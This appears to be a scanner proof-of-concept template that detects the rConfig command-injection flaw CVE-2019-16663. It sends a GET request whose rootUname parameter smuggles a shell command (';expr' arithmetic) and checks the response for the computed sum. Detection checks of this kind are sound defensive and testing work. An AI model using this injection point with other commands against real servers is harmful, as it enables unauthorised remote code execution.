name: poc-yaml-rconfig-cve-2019-16663
set:
  r: randomInt(800000000, 1000000000)
  r1: randomInt(800000000, 1000000000)
rules:
  - method: GET
    path: /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bexpr%20{{r}}%20%2B%20{{r1}}%20%20%23
    expression: |
      response.status == 200 && response.body.bcontains(bytes(string(r + r1)))
detail:
  author: 17bdw
  links:
    - https://github.com/rconfig/rconfig/commit/6ea92aa307e20f0918ebd18be9811e93048d5071
    - https://www.cnblogs.com/17bdw/p/11840588.html
    - https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/